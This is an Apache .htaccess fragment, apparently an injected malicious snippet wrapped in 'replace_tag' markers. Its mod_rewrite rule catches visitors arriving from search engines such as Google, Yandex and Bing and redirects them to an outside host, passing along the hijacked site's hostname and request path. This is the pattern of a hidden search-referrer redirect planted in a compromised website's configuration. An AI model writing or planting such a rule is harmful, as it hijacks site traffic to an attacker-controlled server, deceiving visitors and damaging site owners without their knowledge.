#replace_tag
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*(aol|google|rambler|mail|yandex|bing|yahoo).*$ [NC]
RewriteRule .* http://unem3lx.dumb1.com/wstat/accepter.php?h=%{HTTP_HOST}&u=%{REQUEST_URI}&f=bbd15b275ef0ced787d2e16fe954c7f8&d=84c36b3f8fc9663c40afb1f2dfb69cf3 [R,L]
</IfModule>
#replace_tag
